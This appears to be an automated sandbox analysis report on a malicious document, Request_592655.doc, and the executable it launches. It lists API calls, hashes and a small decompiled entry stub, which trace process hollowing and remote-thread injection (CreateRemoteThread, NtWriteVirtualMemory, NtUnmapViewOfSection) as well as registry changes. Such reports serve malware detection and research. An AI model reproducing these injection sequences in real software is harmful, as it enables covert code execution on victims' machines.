  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}


APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:39
Initial Analysis Report:Open
Initial sample Analysis ID:60981
Initial sample SHA 256:93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:Request_592655.doc

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
